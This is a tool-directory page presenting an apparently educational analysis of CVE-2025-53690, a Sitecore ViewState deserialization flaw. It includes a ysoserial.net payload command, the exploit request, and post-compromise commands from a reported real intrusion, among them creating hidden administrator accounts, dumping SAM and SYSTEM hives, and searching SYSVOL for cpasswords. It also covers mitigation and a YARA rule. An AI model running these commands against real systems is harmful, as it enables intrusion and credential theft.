Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-53690-Analysis — هذه هي وثائق تحليل CVE-2025-53690. | Kitploit
أدوات/GitHubGitHub/m0d0ri205/cve-2025-53690-analysis
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتحقيق الجنائي الرقميتحليل البرمجيات الخبيثةاختبار الاختراقالتعلم والتعليمالفريق الأحمرالاستجابة للحوادث
GitHubm0d0ri205/cve-2025-53690-analysis

CVE-2025-53690-Analysis

هذه هي وثائق تحليل CVE-2025-53690.

34منذ سنة واحدةلم تتم المراجعة بعد
عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-53690: تحليل ثغرة إلغاء تسلسل ViewState في Sitecore

نظرة عامة

CVE-2025-53690 هي ثغرة أمنية خطيرة في إلغاء تسلسل ViewState تم اكتشافها في عائلة منتجات Sitecore، وتتيح تنفيذ التعليمات البرمجية عن بُعد من خلال استغلال مفاتيح machine key المكشوفة الخاصة بـ ASP.NET.

المعلومات الأساسية

  • CVE ID: CVE-2025-53690
  • درجة CVSS: 9.0 (Critical)
  • نوع الثغرة: Deserialization of Untrusted Data (CWE-502)
  • تاريخ الاكتشاف: سبتمبر 2025
  • تاريخ الإعلان: 3 سبتمبر 2025
  • الاستغلال الفعلي: تم استغلالها كثغرة يوم-صفر (Zero-day) منذ ديسمبر 2024

المنتجات المتأثرة

  • Sitecore Experience Manager (XM) - جميع الإصدارات 9.0 وما دون
  • Sitecore Experience Platform (XP) - جميع الإصدارات 9.0 وما دون
  • Sitecore Experience Commerce (XC)
  • Sitecore Managed Cloud
  • وحدة Active Directory الإصدار 1.4 وما دون

التحليل التفصيلي للثغرة

السبب الجذري

يكمن جوهر هذه الثغرة في سوء إدارة التكوين:

  1. استخدام مفاتيح Machine Key نموذجية: تم استخدام مفاتيح machine key النموذجية الخاصة بـ ASP.NET، الواردة في أدلة نشر Sitecore قبل عام 2017، كما هي في بيئات الإنتاج
  2. إعادة استخدام مفاتيح ثابتة: تم استخدام نفس machine key بشكل متكرر عبر عمليات نشر متعددة
  3. تجاوز التحقق من ViewState: يمكن تجاوز التحقق من تكامل ViewState باستخدام المفاتيح المكشوفة

آلية ViewState في ASP.NET

تُعد ViewState إحدى ميزات إدارة الحالة في ASP.NET، وتعمل على:

  • تخزين حالة صفحة الويب في الحقل المخفي __VIEWSTATE
  • ضمان التكامل والسرية باستخدام machine key
  • يقوم الخادم بإلغاء تسلسل ViewState لاستعادة حالة الصفحة
root@kitploit:~
<!-- web.config 예시 -->
<system.web>
    <machineKey 
        validationKey="[64바이트 키]"
        decryptionKey="[48바이트 키]"
        validation="HMACSHA256" 
        decryption="AES" />
</system.web>

نواقل الهجوم

1. تحديد نقاط النهاية الضعيفة

root@kitploit:~
Target: /sitecore/blocked.aspx
Method: POST
특징: 인증 없이 접근 가능, ViewState 사용

2. إنشاء حمولة ViewState خبيثة

ينشئ المهاجم حمولة خبيثة باستخدام machine key معروف وأداة ysoserial.net:

root@kitploit:~
# ysoserial.net 사용 예시
ysoserial.exe -f ViewState -g TypeConfuseDelegate -c "calc.exe" --validationkey="[키]" --validationalg="HMACSHA256" --decryptionkey="[키]" --decryptionalg="AES"

3. إرسال طلب HTTP

root@kitploit:~
POST /sitecore/blocked.aspx HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

__VIEWSTATE=[악성_페이로드]&__VIEWSTATEGENERATOR=[값]

تحليل سيناريو الهجوم الفعلي (تقرير Mandiant)

دورة حياة الهجوم

المرحلة 1: الاختراق الأولي

  • نقطة النهاية: /sitecore/blocked.aspx
  • الطريقة: هجوم إلغاء تسلسل ViewState
  • الصلاحية: NETWORK SERVICE (IIS worker process)
  • الحمولة: أداة الاستطلاع WEEPSTEEL

المرحلة 2: الاستطلاع وتثبيت موطئ قدم

root@kitploit:~
# 실행된 명령들
whoami
hostname  
net user
tasklist
ipconfig /all
netstat -ano
net group "domain admins"

الأدوات التي تم نشرها:

  • 7za.exe: أداة ضغط الملفات
  • lfe.ico: أداة الأنفاق الشبكية EARTHWORM
  • 1.vbs: نص VBScript لتنفيذ الأوامر

المرحلة 3: رفع الصلاحيات

root@kitploit:~
# 로컬 관리자 계정 생성
net user asp$ [패스워드] /add
net localgroup administrators asp$ /add

net user sawadmin [패스워드] /add  
net localgroup administrators sawadmin /add

جمع بيانات الاعتماد:

root@kitploit:~
reg save HKLM\SYSTEM c:\users\public\system.hive
reg save HKLM\SAM c:\users\public\sam.hive

المرحلة 4: ضمان الاستمرارية

  • الوصول عبر RDP: استخدام حساب المسؤول الذي تم إنشاؤه
  • DWAGENT: تثبيت أداة الوصول عن بُعد (تسجيل كخدمة بصلاحيات SYSTEM)
  • تغيير إعدادات الحساب:
root@kitploit:~
net user [AdminUser] /passwordchg:no /expires:never
wmic useraccount where name='[AdminUser]' set PasswordExpires=False

المرحلة 5: الاستطلاع الداخلي

root@kitploit:~
# Domain Controller 식별
nltest /DCLIST:[domain]
nslookup [domain-controller]

# GPO에서 cpassword 검색 (Group Policy Preferences 공격)
findstr /S /l cpassword \\[DC]\sysvol\[domain]\policies\*.xml

# BloodHound/SharpHound 실행
sh.exe -c all

المرحلة 6: الحركة الجانبية

  • الوصول عبر RDP إلى أنظمة أخرى باستخدام حساب مسؤول المجال الذي تم الاستيلاء عليه
  • تجاوز الإجراءات الأمنية عبر الأنفاق الشبكية باستخدام EARTHWORM

تحليل الأدوات المستخدمة

WEEPSTEEL (أداة استطلاع)

root@kitploit:~
// 수집하는 정보
Information.BasicsInfo basicsInfo = new Information.BasicsInfo
{
    Directories = new Information.Directories
    {
        CurrentWebDirectory = HostingEnvironment.MapPath("~/")
    },
    OperatingSystemInformation = Information.GetOperatingSystemInformation(),
    DiskInformation = Information.GetDiskInformation(),
    NetworkAdapterInformation = Information.GetNetworkAdapterInformation(),
    Process = Information.GetProcessInformation()
};

طريقة الإخراج: إخفاء البيانات عبر التمويه كـ ViewState

root@kitploit:~
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 
       value="/wEPDwUKLTcyODc4{AES 암호화 + base64 인코딩된 출력}" />

EARTHWORM (الأنفاق الشبكية)

  • توفير وظيفة خادم وكيل SOCKS v5
  • تجاوز جدران الحماية وإخفاء حركة المرور
  • تمرير حركة مرور RDP عبر الأنفاق لتجنب الاكتشاف

DWAGENT (الوصول عن بُعد)

  • أداة إدارة عن بُعد مشروعة
  • تسجيل كخدمة بصلاحيات SYSTEM
  • ضمان الاستمرارية عبر بدء التشغيل التلقائي

SHARPHOUND (استطلاع Active Directory)

  • أداة جمع البيانات الخاصة بـ BloodHound
  • رسم خريطة بيئة Active Directory
  • تحديد مسارات الهجوم

الدفاع وإجراءات التخفيف

الإجراءات الفورية

root@kitploit:~
<!-- 고유한 machine key 생성 -->
<machineKey 
    validationKey="[새로운_64바이트_키]"
    decryptionKey="[새로운_48바이트_키]"
    validation="HMACSHA256" 
    decryption="AES" />

إجراءات تعزيز الأمان

  1. تدوير المفاتيح تلقائيًا
  2. تفعيل التحقق من MAC الخاص بـ ViewState
  3. تشفير ملفات التكوين
  4. تقسيم الشبكة
  5. تعزيز المراقبة

قواعد الاكتشاف

root@kitploit:~
# YARA 규칙 예시 (WEEPSTEEL 탐지)
rule WEEPSTEEL_Detection {
    strings:
        $viewstate = "__VIEWSTATE"
        $crypto = "System.Security.Cryptography"
        $serializer = "JavaScriptSerializer"
    condition:
        all of them
}

الخلاصة

تُعد CVE-2025-53690 مثالًا بارزًا على كيفية تحول خطأ تكوين بسيط إلى تهديد أمني خطير. من خلال هذه الثغرة، يمكن للمتعلمين تجربة دورة الحياة الكاملة لهجوم APT حقيقي وفهم تقنيات الهجوم الحديثة واستراتيجيات الدفاع.

المراجع

  • Google Cloud Blog - ViewState Deserialization Zero-Day
  • Sitecore Advisory SC2025-005
  • CISA KEV Catalog
  • ysoserial.net
  • Microsoft Security Blog - ASP.NET Machine Keys
تنزيل الأداة